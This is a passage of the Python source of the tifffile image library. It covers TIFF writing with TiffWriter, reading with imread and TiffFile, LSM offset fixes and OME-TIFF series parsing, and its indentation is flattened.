<https://github.com/CellProfiler/python-bioformats>`_
Acknowledgements
----------------
* Egor Zindy, University of Manchester, for cz_lsm_scan_info specifics.
* Wim Lewis for a bug fix and some read_cz_lsm functions.
* Hadrien Mary for help on reading MicroManager files.
References
----------
(1) TIFF 6.0 Specification and Supplements. Adobe Systems Incorporated.
http://partners.adobe.com/public/developer/tiff/
(2) TIFF File Format FAQ. http://www.awaresystems.be/imaging/tiff/faq.html
(3) MetaMorph Stack (STK) Image File Format.
http://support.meta.moleculardevices.com/docs/t10243.pdf
(4) Image File Format Description LSM 5/7 Release 6.0 (ZEN 2010).
Carl Zeiss MicroImaging GmbH. BioSciences. May 10, 2011
(5) File Format Description - LSM 5xx Release 2.0.
http://ibb.gsf.de/homepage/karsten.rodenacker/IDL/Lsmfile.doc
(6) The OME-TIFF format.
http://www.openmicroscopy.org/site/support/file-formats/ome-tiff
(7) UltraQuant(r) Version 6.0 for Windows Start-Up Guide.
http://www.ultralum.com/images%20ultralum/pdf/UQStart%20Up%20Guide.pdf
(8) Micro-Manager File Formats.
http://www.micro-manager.org/wiki/Micro-Manager_File_Formats
(9) Tags for TIFF and Related Specifications. Digital Preservation.
http://www.digitalpreservation.gov/formats/content/tiff_tags.shtml
Examples
--------
>>> data = numpy.random.rand(5, 301, 219)
>>> imsave('temp.tif', data)
>>> image = imread('temp.tif')
>>> numpy.testing.assert_array_equal(image, data)
>>> with TiffFile('temp.tif') as tif:
... images = tif.asarray()
... for page in tif:
... for tag in page.tags.values():
... t = tag.name, tag.value
... image = page.asarray()
"""
from __future__ import division, print_function
import sys
import os
import re
import glob
import math
import zlib
import time
import json
import struct
import warnings
import tempfile
import datetime
import collections
from fractions import Fraction
from xml.etree import cElementTree as etree
import numpy
try:
from . import _tifffile
except ImportError:
pass
__version__ = '0.3.3'
__docformat__ = 'restructuredtext en'
__all__ = ('imsave', 'imread', 'imshow', 'TiffFile', 'TiffWriter',
'TiffSequence')
def imsave(filename, data, **kwargs):
"""Write image data to TIFF file.
Refer to the TiffWriter class and member functions for documentation.
Parameters
----------
filename : str
Name of file to write.
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
kwargs : dict
Parameters 'byteorder', 'bigtiff', and 'software' are passed to
the TiffWriter class.
Parameters 'photometric', 'planarconfig', 'resolution',
'description', 'compress', 'volume', and 'extratags' are passed to
the TiffWriter.save function.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> description = '{"shape": %s}' % str(list(data.shape))
>>> imsave('temp.tif', data, compress=6,
... extratags=[(270, 's', 0, description, True)])
"""
tifargs = {}
for key in ('byteorder', 'bigtiff', 'software', 'writeshape'):
if key in kwargs:
tifargs[key] = kwargs[key]
del kwargs[key]
if 'writeshape' not in kwargs:
kwargs['writeshape'] = True
if 'bigtiff' not in tifargs and data.size*data.dtype.itemsize > 2000*2**20:
tifargs['bigtiff'] = True
with TiffWriter(filename, **tifargs) as tif:
tif.save(data, **kwargs)
class TiffWriter(object):
"""Write image data to TIFF file.
TiffWriter instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Examples
--------
>>> data = numpy.random.rand(2, 5, 3, 301, 219)
>>> with TiffWriter('temp.tif', bigtiff=True) as tif:
... for i in range(data.shape[0]):
... tif.save(data[i], compress=6)
"""
TYPES = {'B': 1, 's': 2, 'H': 3, 'I': 4, '2I': 5, 'b': 6,
'h': 8, 'i': 9, 'f': 11, 'd': 12, 'Q': 16, 'q': 17}
TAGS = {
'new_subfile_type': 254, 'subfile_type': 255,
'image_width': 256, 'image_length': 257, 'bits_per_sample': 258,
'compression': 259, 'photometric': 262, 'fill_order': 266,
'document_name': 269, 'image_description': 270, 'strip_offsets': 273,
'orientation': 274, 'samples_per_pixel': 277, 'rows_per_strip': 278,
'strip_byte_counts': 279, 'x_resolution': 282, 'y_resolution': 283,
'planar_configuration': 284, 'page_name': 285, 'resolution_unit': 296,
'software': 305, 'datetime': 306, 'predictor': 317, 'color_map': 320,
'tile_width': 322, 'tile_length': 323, 'tile_offsets': 324,
'tile_byte_counts': 325, 'extra_samples': 338, 'sample_format': 339,
'image_depth': 32997, 'tile_depth': 32998}
def __init__(self, filename, bigtiff=False, byteorder=None,
software='tifffile.py'):
"""Create a new TIFF file for writing.
Use bigtiff=True when creating files greater than 2 GB.
Parameters
----------
filename : str
Name of file to write.
bigtiff : bool
If True, the BigTIFF format is used.
byteorder : {'<', '>'}
The endianness of the data in the file.
By default this is the system's native byte order.
software : str
Name of the software used to create the image.
Saved with the first page only.
"""
if byteorder not in (None, '<', '>'):
raise ValueError("invalid byteorder %s" % byteorder)
if byteorder is None:
byteorder = '<' if sys.byteorder == 'little' else '>'
self._byteorder = byteorder
self._software = software
self._fh = open(filename, 'wb')
self._fh.write({'<': b'II', '>': b'MM'}[byteorder])
if bigtiff:
self._bigtiff = True
self._offset_size = 8
self._tag_size = 20
self._numtag_format = 'Q'
self._offset_format = 'Q'
self._val_format = '8s'
self._fh.write(struct.pack(byteorder+'HHH', 43, 8, 0))
else:
self._bigtiff = False
self._offset_size = 4
self._tag_size = 12
self._numtag_format = 'H'
self._offset_format = 'I'
self._val_format = '4s'
self._fh.write(struct.pack(byteorder+'H', 42))
# first IFD
self._ifd_offset = self._fh.tell()
self._fh.write(struct.pack(byteorder+self._offset_format, 0))
def save(self, data, photometric=None, planarconfig=None, resolution=None,
description=None, volume=False, writeshape=False, compress=0,
extratags=()):
"""Write image data to TIFF file.
Image data are written in one stripe per plane.
Dimensions larger than 2 to 4 (depending on photometric mode, planar
configuration, and SGI mode) are flattened and saved as separate pages.
The 'sample_format' and 'bits_per_sample' TIFF tags are derived from
the data type.
Parameters
----------
data : array_like
Input image. The last dimensions are assumed to be image depth,
height, width, and samples.
photometric : {'minisblack', 'miniswhite', 'rgb'}
The color space of the image data.
By default this setting is inferred from the data shape.
planarconfig : {'contig', 'planar'}
Specifies if samples are stored contiguous or in separate planes.
By default this setting is inferred from the data shape.
'contig': last dimension contains samples.
'planar': third last dimension contains samples.
resolution : (float, float) or ((int, int), (int, int))
X and Y resolution in dots per inch as float or rational numbers.
description : str
The subject of the image. Saved with the first page only.
compress : int
Values from 0 to 9 controlling the level of zlib compression.
If 0, data are written uncompressed (default).
volume : bool
If True, volume data are stored in one tile (if applicable) using
the SGI image_depth and tile_depth tags.
Image width and depth must be multiple of 16.
Few software can read this format, e.g. MeVisLab.
writeshape : bool
If True, write the data shape to the image_description tag
if necessary and no other description is given.
extratags: sequence of tuples
Additional tags as [(code, dtype, count, value, writeonce)].
code : int
The TIFF tag Id.
dtype : str
Data type of items in 'value' in Python struct format.
One of B, s, H, I, 2I, b, h, i, f, d, Q, or q.
count : int
Number of data values. Not used for string values.
value : sequence
'Count' values compatible with 'dtype'.
writeonce : bool
If True, the tag is written to the first page only.
"""
if photometric not in (None, 'minisblack', 'miniswhite', 'rgb'):
raise ValueError("invalid photometric %s" % photometric)
if planarconfig not in (None, 'contig', 'planar'):
raise ValueError("invalid planarconfig %s" % planarconfig)
if not 0 <= compress <= 9:
raise ValueError("invalid compression level %s" % compress)
fh = self._fh
byteorder = self._byteorder
numtag_format = self._numtag_format
val_format = self._val_format
offset_format = self._offset_format
offset_size = self._offset_size
tag_size = self._tag_size
data = numpy.asarray(data, dtype=byteorder+data.dtype.char, order='C')
data_shape = shape = data.shape
data = numpy.atleast_2d(data)
# normalize shape of data
samplesperpixel = 1
extrasamples = 0
if volume and data.ndim < 3:
volume = False
if photometric is None:
if planarconfig:
photometric = 'rgb'
elif data.ndim > 2 and shape[-1] in (3, 4):
photometric = 'rgb'
elif volume and data.ndim > 3 and shape[-4] in (3, 4):
photometric = 'rgb'
elif data.ndim > 2 and shape[-3] in (3, 4):
photometric = 'rgb'
else:
photometric = 'minisblack'
if planarconfig and len(shape) <= (3 if volume else 2):
planarconfig = None
photometric = 'minisblack'
if photometric == 'rgb':
if len(shape) < 3:
raise ValueError("not a RGB(A) image")
if len(shape) < 4:
volume = False
if planarconfig is None:
if shape[-1] in (3, 4):
planarconfig = 'contig'
elif shape[-4 if volume else -3] in (3, 4):
planarconfig = 'planar'
elif shape[-1] > shape[-4 if volume else -3]:
planarconfig = 'planar'
else:
planarconfig = 'contig'
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
if samplesperpixel > 3:
extrasamples = samplesperpixel - 3
elif planarconfig and len(shape) > (3 if volume else 2):
if planarconfig == 'contig':
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
samplesperpixel = data.shape[-1]
else:
data = data.reshape(
(-1,) + shape[(-4 if volume else -3):] + (1,))
samplesperpixel = data.shape[1]
extrasamples = samplesperpixel - 1
else:
planarconfig = None
# remove trailing 1s
while len(shape) > 2 and shape[-1] == 1:
shape = shape[:-1]
if len(shape) < 3:
volume = False
if False and (
len(shape) > (3 if volume else 2) and shape[-1] < 5 and
all(shape[-1] < i
for i in shape[(-4 if volume else -3):-1])):
# DISABLED: non-standard TIFF, e.g. (220, 320, 2)
planarconfig = 'contig'
samplesperpixel = shape[-1]
data = data.reshape((-1, 1) + shape[(-4 if volume else -3):])
else:
data = data.reshape(
(-1, 1) + shape[(-3 if volume else -2):] + (1,))
if samplesperpixel == 2:
warnings.warn("writing non-standard TIFF (samplesperpixel 2)")
if volume and (data.shape[-2] % 16 or data.shape[-3] % 16):
warnings.warn("volume width or length are not multiple of 16")
volume = False
data = numpy.swapaxes(data, 1, 2)
data = data.reshape(
(data.shape[0] * data.shape[1],) + data.shape[2:])
# data.shape is now normalized 5D or 6D, depending on volume
# (pages, planar_samples, (depth,) height, width, contig_samples)
assert len(data.shape) in (5, 6)
shape = data.shape
bytestr = bytes if sys.version[0] == '2' else (
lambda x: bytes(x, 'utf-8') if isinstance(x, str) else x)
tags = [] # list of (code, ifdentry, ifdvalue, writeonce)
if volume:
# use tiles to save volume data
tag_byte_counts = TiffWriter.TAGS['tile_byte_counts']
tag_offsets = TiffWriter.TAGS['tile_offsets']
else:
# else use strips
tag_byte_counts = TiffWriter.TAGS['strip_byte_counts']
tag_offsets = TiffWriter.TAGS['strip_offsets']
def pack(fmt, *val):
return struct.pack(byteorder+fmt, *val)
def addtag(code, dtype, count, value, writeonce=False):
# Compute ifdentry & ifdvalue bytes from code, dtype, count, value.
# Append (code, ifdentry, ifdvalue, writeonce) to tags list.
code = int(TiffWriter.TAGS.get(code, code))
try:
tifftype = TiffWriter.TYPES[dtype]
except KeyError:
raise ValueError("unknown dtype %s" % dtype)
rawcount = count
if dtype == 's':
value = bytestr(value) + b'\0'
count = rawcount = len(value)
value = (value, )
if len(dtype) > 1:
count *= int(dtype[:-1])
dtype = dtype[-1]
ifdentry = [pack('HH', code, tifftype),
pack(offset_format, rawcount)]
ifdvalue = None
if count == 1:
if isinstance(value, (tuple, list)):
value = value[0]
ifdentry.append(pack(val_format, pack(dtype, value)))
elif struct.calcsize(dtype) * count <= offset_size:
ifdentry.append(pack(val_format,
pack(str(count)+dtype, *value)))
else:
ifdentry.append(pack(offset_format, 0))
ifdvalue = pack(str(count)+dtype, *value)
tags.append((code, b''.join(ifdentry), ifdvalue, writeonce))
def rational(arg, max_denominator=1000000):
            # return numerator and denominator from float or two integers
try:
f = Fraction.from_float(arg)
except TypeError:
f = Fraction(arg[0], arg[1])
f = f.limit_denominator(max_denominator)
return f.numerator, f.denominator
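        # Expected behavior of the helper above (a sketch of sample values):
        #     rational(300.0)   -> (300, 1)
        #     rational((72, 2)) -> (36, 1)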
if self._software:
addtag('software', 's', 0, self._software, writeonce=True)
self._software = None # only save to first page
if description:
addtag('image_description', 's', 0, description, writeonce=True)
elif writeshape and shape[0] > 1 and shape != data_shape:
addtag('image_description', 's', 0,
"shape=(%s)" % (",".join('%i' % i for i in data_shape)),
writeonce=True)
addtag('datetime', 's', 0,
datetime.datetime.now().strftime("%Y:%m:%d %H:%M:%S"),
writeonce=True)
addtag('compression', 'H', 1, 32946 if compress else 1)
addtag('orientation', 'H', 1, 1)
addtag('image_width', 'I', 1, shape[-2])
addtag('image_length', 'I', 1, shape[-3])
if volume:
addtag('image_depth', 'I', 1, shape[-4])
addtag('tile_depth', 'I', 1, shape[-4])
addtag('tile_width', 'I', 1, shape[-2])
addtag('tile_length', 'I', 1, shape[-3])
addtag('new_subfile_type', 'I', 1, 0 if shape[0] == 1 else 2)
addtag('sample_format', 'H', 1,
{'u': 1, 'i': 2, 'f': 3, 'c': 6}[data.dtype.kind])
addtag('photometric', 'H', 1,
{'miniswhite': 0, 'minisblack': 1, 'rgb': 2}[photometric])
addtag('samples_per_pixel', 'H', 1, samplesperpixel)
if planarconfig and samplesperpixel > 1:
addtag('planar_configuration', 'H', 1, 1
if planarconfig == 'contig' else 2)
addtag('bits_per_sample', 'H', samplesperpixel,
(data.dtype.itemsize * 8, ) * samplesperpixel)
else:
addtag('bits_per_sample', 'H', 1, data.dtype.itemsize * 8)
if extrasamples:
if photometric == 'rgb' and extrasamples == 1:
addtag('extra_samples', 'H', 1, 1) # associated alpha channel
else:
addtag('extra_samples', 'H', extrasamples, (0,) * extrasamples)
if resolution:
addtag('x_resolution', '2I', 1, rational(resolution[0]))
addtag('y_resolution', '2I', 1, rational(resolution[1]))
addtag('resolution_unit', 'H', 1, 2)
addtag('rows_per_strip', 'I', 1,
shape[-3] * (shape[-4] if volume else 1))
# use one strip or tile per plane
strip_byte_counts = (data[0, 0].size * data.dtype.itemsize,) * shape[1]
addtag(tag_byte_counts, offset_format, shape[1], strip_byte_counts)
addtag(tag_offsets, offset_format, shape[1], (0, ) * shape[1])
# add extra tags from users
for t in extratags:
addtag(*t)
# the entries in an IFD must be sorted in ascending order by tag code
tags = sorted(tags, key=lambda x: x[0])
if not self._bigtiff and (fh.tell() + data.size*data.dtype.itemsize
> 2**31-1):
raise ValueError("data too large for non-bigtiff file")
for pageindex in range(shape[0]):
# update pointer at ifd_offset
pos = fh.tell()
fh.seek(self._ifd_offset)
fh.write(pack(offset_format, pos))
fh.seek(pos)
# write ifdentries
fh.write(pack(numtag_format, len(tags)))
tag_offset = fh.tell()
fh.write(b''.join(t[1] for t in tags))
self._ifd_offset = fh.tell()
fh.write(pack(offset_format, 0)) # offset to next IFD
# write tag values and patch offsets in ifdentries, if necessary
for tagindex, tag in enumerate(tags):
if tag[2]:
pos = fh.tell()
fh.seek(tag_offset + tagindex*tag_size + offset_size + 4)
fh.write(pack(offset_format, pos))
fh.seek(pos)
if tag[0] == tag_offsets:
strip_offsets_offset = pos
elif tag[0] == tag_byte_counts:
strip_byte_counts_offset = pos
fh.write(tag[2])
# write image data
data_offset = fh.tell()
if compress:
strip_byte_counts = []
for plane in data[pageindex]:
plane = zlib.compress(plane, compress)
strip_byte_counts.append(len(plane))
fh.write(plane)
else:
                # if this fails, try updating Python/numpy
data[pageindex].tofile(fh)
fh.flush()
# update strip and tile offsets and byte_counts if necessary
pos = fh.tell()
for tagindex, tag in enumerate(tags):
if tag[0] == tag_offsets: # strip or tile offsets
if tag[2]:
fh.seek(strip_offsets_offset)
strip_offset = data_offset
for size in strip_byte_counts:
fh.write(pack(offset_format, strip_offset))
strip_offset += size
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, data_offset))
elif tag[0] == tag_byte_counts: # strip or tile byte_counts
if compress:
if tag[2]:
fh.seek(strip_byte_counts_offset)
for size in strip_byte_counts:
fh.write(pack(offset_format, size))
else:
fh.seek(tag_offset + tagindex*tag_size +
offset_size + 4)
fh.write(pack(offset_format, strip_byte_counts[0]))
break
fh.seek(pos)
fh.flush()
# remove tags that should be written only once
if pageindex == 0:
tags = [t for t in tags if not t[-1]]
def close(self):
self._fh.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def imread(files, **kwargs):
"""Return image data from TIFF file(s) as numpy array.
The first image series is returned if no arguments are provided.
Parameters
----------
files : str or list
File name, glob pattern, or list of file names.
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages in file to return as array.
multifile : bool
If True (default), OME-TIFF data may include pages from multiple files.
pattern : str
Regular expression pattern that matches axes names and indices in
file names.
kwargs : dict
Additional parameters passed to the TiffFile or TiffSequence asarray
function.
Examples
--------
>>> im = imread('temp.tif', key=0)
>>> im.shape
(3, 301, 219)
>>> ims = imread(['temp.tif', 'temp.tif'])
>>> ims.shape
(2, 10, 3, 301, 219)
"""
kwargs_file = {}
if 'multifile' in kwargs:
kwargs_file['multifile'] = kwargs['multifile']
del kwargs['multifile']
else:
kwargs_file['multifile'] = True
kwargs_seq = {}
if 'pattern' in kwargs:
kwargs_seq['pattern'] = kwargs['pattern']
del kwargs['pattern']
if isinstance(files, basestring) and any(i in files for i in '?*'):
files = glob.glob(files)
if not files:
raise ValueError('no files found')
if len(files) == 1:
files = files[0]
if isinstance(files, basestring):
with TiffFile(files, **kwargs_file) as tif:
return tif.asarray(**kwargs)
else:
with TiffSequence(files, **kwargs_seq) as imseq:
return imseq.asarray(**kwargs)
class lazyattr(object):
"""Lazy object attribute whose value is computed on first access."""
__slots__ = ('func', )
def __init__(self, func):
self.func = func
def __get__(self, instance, owner):
if instance is None:
return self
value = self.func(instance)
if value is NotImplemented:
return getattr(super(owner, instance), self.func.__name__)
setattr(instance, self.func.__name__, value)
return value
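# Usage sketch for lazyattr (illustrative; 'expensive_scan' is hypothetical):
#     class Reader(object):
#         @lazyattr
#         def index(self):
#             return expensive_scan(self)  # computed once, cached on instance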
class TiffFile(object):
"""Read image and metadata from TIFF, STK, LSM, and FluoView files.
TiffFile instances must be closed using the close method, which is
automatically called when using the 'with' statement.
Attributes
----------
pages : list
All TIFF pages in file.
series : list of Records(shape, dtype, axes, TiffPages)
TIFF pages with compatible shapes and types.
micromanager_metadata: dict
Extra MicroManager non-TIFF metadata in the file, if exists.
All attributes are read-only.
Examples
--------
>>> with TiffFile('temp.tif') as tif:
... data = tif.asarray()
... data.shape
(5, 301, 219)
"""
def __init__(self, arg, name=None, offset=None, size=None,
multifile=True, multifile_close=True):
"""Initialize instance from file.
Parameters
----------
arg : str or open file
Name of file or open file object.
The file objects are closed in TiffFile.close().
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
multifile : bool
If True (default), series may include pages from multiple files.
Currently applies to OME-TIFF only.
multifile_close : bool
If True (default), keep the handles of other files in multifile
series closed. This is inefficient when few files refer to
many pages. If False, the C runtime may run out of resources.
"""
self._fh = FileHandle(arg, name=name, offset=offset, size=size)
self.offset_size = None
self.pages = []
self._multifile = bool(multifile)
self._multifile_close = bool(multifile_close)
self._files = {self._fh.name: self} # cache of TiffFiles
try:
self._fromfile()
except Exception:
self._fh.close()
raise
@property
def filehandle(self):
"""Return file handle."""
return self._fh
@property
def filename(self):
"""Return name of file handle."""
return self._fh.name
def close(self):
"""Close open file handle(s)."""
for tif in self._files.values():
tif._fh.close()
self._files = {}
def _fromfile(self):
"""Read TIFF header and all page records from file."""
self._fh.seek(0)
try:
self.byteorder = {b'II': '<', b'MM': '>'}[self._fh.read(2)]
except KeyError:
raise ValueError("not a valid TIFF file")
version = struct.unpack(self.byteorder+'H', self._fh.read(2))[0]
if version == 43: # BigTiff
self.offset_size, zero = struct.unpack(self.byteorder+'HH',
self._fh.read(4))
if zero or self.offset_size != 8:
raise ValueError("not a valid BigTIFF file")
elif version == 42:
self.offset_size = 4
else:
raise ValueError("not a TIFF file")
self.pages = []
while True:
try:
page = TiffPage(self)
self.pages.append(page)
except StopIteration:
break
if not self.pages:
raise ValueError("empty TIFF file")
if self.is_micromanager:
# MicroManager files contain metadata not stored in TIFF tags.
self.micromanager_metadata = read_micromanager_metadata(self._fh)
if self.is_lsm:
self._fix_lsm_strip_offsets()
self._fix_lsm_strip_byte_counts()
def _fix_lsm_strip_offsets(self):
"""Unwrap strip offsets for LSM files greater than 4 GB."""
for series in self.series:
wrap = 0
previous_offset = 0
for page in series.pages:
strip_offsets = []
for current_offset in page.strip_offsets:
if current_offset < previous_offset:
wrap += 2**32
strip_offsets.append(current_offset + wrap)
previous_offset = current_offset
page.strip_offsets = tuple(strip_offsets)
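        # e.g. raw strip offsets (4294967000, 120, 640) become
        # (4294967000, 120 + 2**32, 640 + 2**32) after the 32-bit value wraps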
def _fix_lsm_strip_byte_counts(self):
"""Set strip_byte_counts to size of compressed data.
The strip_byte_counts tag in LSM files contains the number of bytes
for the uncompressed data.
"""
if not self.pages:
return
strips = {}
for page in self.pages:
assert len(page.strip_offsets) == len(page.strip_byte_counts)
for offset, bytecount in zip(page.strip_offsets,
page.strip_byte_counts):
strips[offset] = bytecount
offsets = sorted(strips.keys())
offsets.append(min(offsets[-1] + strips[offsets[-1]], self._fh.size))
for i, offset in enumerate(offsets[:-1]):
strips[offset] = min(strips[offset], offsets[i+1] - offset)
for page in self.pages:
if page.compression:
page.strip_byte_counts = tuple(
strips[offset] for offset in page.strip_offsets)
@lazyattr
def series(self):
"""Return series of TiffPage with compatible shape and properties."""
if not self.pages:
return []
series = []
page0 = self.pages[0]
if self.is_ome:
series = self._omeseries()
elif self.is_fluoview:
dims = {b'X': 'X', b'Y': 'Y', b'Z': 'Z', b'T': 'T',
b'WAVELENGTH': 'C', b'TIME': 'T', b'XY': 'R',
b'EVENT': 'V', b'EXPOSURE': 'L'}
mmhd = list(reversed(page0.mm_header.dimensions))
series = [Record(
axes=''.join(dims.get(i[0].strip().upper(), 'Q')
for i in mmhd if i[1] > 1),
shape=tuple(int(i[1]) for i in mmhd if i[1] > 1),
pages=self.pages, dtype=numpy.dtype(page0.dtype))]
elif self.is_lsm:
lsmi = page0.cz_lsm_info
axes = CZ_SCAN_TYPES[lsmi.scan_type]
if page0.is_rgb:
axes = axes.replace('C', '').replace('XY', 'XYC')
axes = axes[::-1]
shape = tuple(getattr(lsmi, CZ_DIMENSIONS[i]) for i in axes)
pages = [p for p in self.pages if not p.is_reduced]
series = [Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype))]
if len(pages) != len(self.pages): # reduced RGB pages
pages = [p for p in self.pages if p.is_reduced]
cp = 1
i = 0
while cp < len(pages) and i < len(shape)-2:
cp *= shape[i]
i += 1
shape = shape[:i] + pages[0].shape
axes = axes[:i] + 'CYX'
series.append(Record(axes=axes, shape=shape, pages=pages,
dtype=numpy.dtype(pages[0].dtype)))
elif self.is_imagej:
shape = []
axes = []
ij = page0.imagej_tags
if 'frames' in ij:
shape.append(ij['frames'])
axes.append('T')
if 'slices' in ij:
shape.append(ij['slices'])
axes.append('Z')
if 'channels' in ij and not self.is_rgb:
shape.append(ij['channels'])
axes.append('C')
remain = len(self.pages) // (product(shape) if shape else 1)
if remain > 1:
shape.append(remain)
axes.append('I')
shape.extend(page0.shape)
axes.extend(page0.axes)
axes = ''.join(axes)
series = [Record(pages=self.pages, shape=tuple(shape), axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif self.is_nih:
if len(self.pages) == 1:
shape = page0.shape
axes = page0.axes
else:
shape = (len(self.pages),) + page0.shape
axes = 'I' + page0.axes
series = [Record(pages=self.pages, shape=shape, axes=axes,
dtype=numpy.dtype(page0.dtype))]
elif page0.is_shaped:
# TODO: shaped files can contain multiple series
shape = page0.tags['image_description'].value[7:-1]
shape = tuple(int(i) for i in shape.split(b','))
series = [Record(pages=self.pages, shape=shape,
axes='Q' * len(shape),
dtype=numpy.dtype(page0.dtype))]
# generic detection of series
if not series:
shapes = []
pages = {}
for page in self.pages:
if not page.shape:
continue
shape = page.shape + (page.axes,
page.compression in TIFF_DECOMPESSORS)
if shape not in pages:
shapes.append(shape)
pages[shape] = [page]
else:
pages[shape].append(page)
series = [Record(pages=pages[s],
axes=(('I' + s[-2])
if len(pages[s]) > 1 else s[-2]),
dtype=numpy.dtype(pages[s][0].dtype),
shape=((len(pages[s]), ) + s[:-2]
if len(pages[s]) > 1 else s[:-2]))
for s in shapes]
# remove empty series, e.g. in MD Gel files
series = [s for s in series if sum(s.shape) > 0]
return series
def asarray(self, key=None, series=None, memmap=False):
"""Return image data from multiple TIFF pages as numpy array.
By default the first image series is returned.
Parameters
----------
key : int, slice, or sequence of page indices
Defines which pages to return as array.
series : int
Defines which series of pages to return as array.
memmap : bool
If True, return an array stored in a binary file on disk
if possible.
"""
if key is None and series is None:
series = 0
if series is not None:
pages = self.series[series].pages
else:
pages = self.pages
if key is None:
pass
elif isinstance(key, int):
pages = [pages[key]]
elif isinstance(key, slice):
pages = pages[key]
elif isinstance(key, collections.Iterable):
pages = [pages[k] for k in key]
else:
raise TypeError("key must be an int, slice, or sequence")
if not len(pages):
raise ValueError("no pages selected")
if self.is_nih:
if pages[0].is_palette:
result = stack_pages(pages, colormapped=False, squeeze=False)
result = numpy.take(pages[0].color_map, result, axis=1)
result = numpy.swapaxes(result, 0, 1)
else:
result = stack_pages(pages, memmap=memmap,
colormapped=False, squeeze=False)
elif len(pages) == 1:
return pages[0].asarray(memmap=memmap)
elif self.is_ome:
assert not self.is_palette, "color mapping disabled for ome-tiff"
if any(p is None for p in pages):
# zero out missing pages
firstpage = next(p for p in pages if p)
nopage = numpy.zeros_like(
firstpage.asarray(memmap=False))
s = self.series[series]
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=s.dtype, shape=s.shape)
result = result.reshape(-1)
else:
result = numpy.empty(s.shape, s.dtype).reshape(-1)
index = 0
class KeepOpen:
# keep Tiff files open between consecutive pages
def __init__(self, parent, close):
self.master = parent
self.parent = parent
self._close = close
def open(self, page):
if self._close and page and page.parent != self.parent:
if self.parent != self.master:
self.parent.filehandle.close()
self.parent = page.parent
self.parent.filehandle.open()
def close(self):
if self._close and self.parent != self.master:
self.parent.filehandle.close()
keep = KeepOpen(self, self._multifile_close)
for page in pages:
keep.open(page)
if page:
a = page.asarray(memmap=False, colormapped=False,
reopen=False)
else:
a = nopage
try:
result[index:index + a.size] = a.reshape(-1)
except ValueError as e:
warnings.warn("ome-tiff: %s" % e)
break
index += a.size
keep.close()
else:
result = stack_pages(pages, memmap=memmap)
if key is None:
try:
result.shape = self.series[series].shape
except ValueError:
try:
warnings.warn("failed to reshape %s to %s" % (
result.shape, self.series[series].shape))
# try series of expected shapes
result.shape = (-1,) + self.series[series].shape
except ValueError:
# revert to generic shape
result.shape = (-1,) + pages[0].shape
else:
result.shape = (-1,) + pages[0].shape
return result
def _omeseries(self):
"""Return image series in OME-TIFF file(s)."""
root = etree.fromstring(self.pages[0].tags['image_description'].value)
uuid = root.attrib.get('UUID', None)
self._files = {uuid: self}
dirname = self._fh.dirname
modulo = {}
result = []
for element in root:
if element.tag.endswith('BinaryOnly'):
warnings.warn("ome-xml: not an ome-tiff master file")
break
if element.tag.endswith('StructuredAnnotations'):
for annot in element:
if not annot.attrib.get('Namespace',
'').endswith('modulo'):
continue
for value in annot:
for modul in value:
for along in modul:
if not along.tag[:-1].endswith('Along'):
continue
axis = along.tag[-1]
newaxis = along.attrib.get('Type', 'other')
newaxis = AXES_LABELS[newaxis]
if 'Start' in along.attrib:
labels = range(
int(along.attrib['Start']),
int(along.attrib['End']) + 1,
int(along.attrib.get('Step', 1)))
else:
labels = [label.text for label in along
if label.tag.endswith('Label')]
modulo[axis] = (newaxis, labels)
if not element.tag.endswith('Image'):
continue
for pixels in element:
if not pixels.tag.endswith('Pixels'):
continue
atr = pixels.attrib
dtype = atr.get('Type', None)
axes = ''.join(reversed(atr['DimensionOrder']))
shape = list(int(atr['Size'+ax]) for ax in axes)
size = product(shape[:-2])
ifds = [None] * size
for data in pixels:
if not data.tag.endswith('TiffData'):
continue
atr = data.attrib
ifd = int(atr.get('IFD', 0))
num = int(atr.get('NumPlanes', 1 if 'IFD' in atr else 0))
num = int(atr.get('PlaneCount', num))
idx = [int(atr.get('First'+ax, 0)) for ax in axes[:-2]]
try:
idx = numpy.ravel_multi_index(idx, shape[:-2])
except ValueError:
# ImageJ produces invalid ome-xml when cropping
warnings.warn("ome-xml: invalid TiffData index")
continue
for uuid in data:
if not uuid.tag.endswith('UUID'):
continue
if uuid.text not in self._files:
if not self._multifile:
# abort reading multifile OME series
# and fall back to generic series
return []
fname = uuid.attrib['FileName']
try:
tif = TiffFile(os.path.join(dirname, fname))
except (IOError, ValueError):
tif.close()
warnings.warn(
"ome-xml: failed to read '%s'" % fname)
break
self._files[uuid.text] = tif
if self._multifile_close:
tif.close()
pages = self._files[uuid.text].pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
# only process first uuid
break
else:
pages = self.pages
try:
for i in range(num if num else len(pages)):
ifds[idx + i] = pages[ifd + i]
except IndexError:
warnings.warn("ome-xml: index out of range")
if all(i is None for i in ifds):
# skip images without data
continue
dtype = next(i for i in ifds if i).dtype
result.append(Record(axes=axes, shape=shape, pages=ifds,
dtype=numpy.dtype(dtype)))
for record in result:
for axis, (newaxis, labels) in modulo.items():
i = record.axes.index(axis)
size = len(labels)
if record.shape[i] == size:
record.axes = record.axes.replace(axis, newaxis, 1)
else:
record.shape[i] //= size
record.shape.insert(i+1, size)
record.axes = record.axes.replace(axis, axis+newaxis, 1)
record.shape = tuple(record.shape)
# squeeze dimensions
for record in result:
record.shape, record.axes = squeeze_axes(record.shape, record.axes)
return result
def __len__(self):
"""Return number of image pages in file."""
return len(self.pages)
def __getitem__(self, key):
"""Return specified page."""
return self.pages[key]
def __iter__(self):
"""Return iterator over pages."""
